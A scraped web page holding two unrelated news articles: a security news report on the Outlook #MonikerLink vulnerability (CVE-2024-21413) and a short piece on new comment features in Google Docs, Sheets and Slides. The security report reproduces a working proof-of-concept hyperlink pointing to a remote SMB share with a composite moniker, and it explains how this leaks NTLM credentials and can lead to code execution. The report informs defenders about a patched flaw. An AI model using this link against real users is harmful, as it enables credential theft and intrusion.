Outlook has been discovered to have an interesting vulnerability while handling specific hyperlinks, which was found to be exploited by threat actors in the wild. This vulnerability has been assigned with CVE-2024-21413, and the severity was given as 9.8 (Critical).
However, Microsoft has addressed this vulnerability and fixed it as part of their Patch Tuesday release of February 2024. Successful exploitation of this vulnerability could allow a threat actor to bypass the Office-protected view and open a file in editing mode instead of the “protected mode.”
Live attack simulation Webinar demonstrates various ways in which account takeover can happen and practices to protect your websites and APIs against ATO attacks.
Outlook 0-day RCE Flaw
According to the Checkpoint report, if the hyperlink starts with http:// or https://, Outlook uses Windows’s default browser to open the URL. However, if there are any other protocols like the “Skype” URL protocol, clicking on the hyperlink will display a security warning.
In other cases, like the “file://” protocol, Outlook did not display a warning dialog box. Instead, it had an error message in the Windows Notification Center, and the resource that was tried to access through the link was also not accessed.
If the file was accessed, there is a high chance that the local NTLM credential information could have been leaked.
The #MonikerLink Bug
A slight modification in the “file://” protocol link bypasses the previously shown security restriction and proceeds to access the resource. For testing purposes, the below link was used, which successfully accessed the “test.rtf” file on the remote resource.
| <a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a> |
As stated by researchers, accessing this resource uses the SMB protocol that leaks the local NTLM credential information during the process. Moreover, researchers also tried escalating this attack vector to arbitrary code execution.
Moniker Link string uses the “look up” for COM (Component Object Model) objects on Windows. Outlook calls the ole32!MkParseDisplayName() API for doing this job. As per Microsoft’s API document for Moniker, including “!” makes it a composite moniker.
Exploitation
Researchers used this composite moniker with FileMoniker (\\10.10.111.111\test\test.rtf) + ItemMoniker (something) for accessing Microsoft Word. Windows runs Microsoft Word as a COM server in the background.
If the hyperlink is clicked, Word opens and parses the file “test.rtf” based on the string “\\10.10.111.111\test\test.rtf”. However, this test.rtf is controlled by the attacker, which was further modified to perform arbitrary code execution on the remote system using “WINWORD.EXE”.
Researchers stated this #MonikerLink bug/attack vector may be present in other software and also recommend developers check and fix the issue.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.
[ad_2]
Source link


Google announces changes to Docs, Sheets and Slides comments sections
Firstly, Google is adding new ways to interact with comments that can be selected by going to View / Comments. For example, users will be able to click the new “Show all comments” option to open a full-length view to peruse through multiple comments more easily.
Also, the updated search and filter functionality will make it easier to find what you’re looking for. A curated “For you” list will also be added, which brings up all the comments that require action.Another helpful new feature coming to Docs and Slides in just a few weeks is the option to expand comments. Basically, users will be able to see comments next to the document or presentation content, thus making it easier to review them alongside the content they’re working on.
Furthermore, Google Docs and Sheets users will be getting the ability to minimize comments. This specific feature will reduce comments to icons allowing for a more focused view of the content in these apps. It’s also important to add that this setting will offer users a quick preview with a bunch of info about who is commenting.Last but not least, the option to hide comments is one of the most important features coming next month to all three Google apps: Docs, Sheets, and Slides.
The new features announced this week will be available to all Google Workspace customers, Google Workspace Individual subscribers, as well as users with personal Google accounts. The roll-out is expected to start on March 1 and should take about three days.
[ad_2]
Source link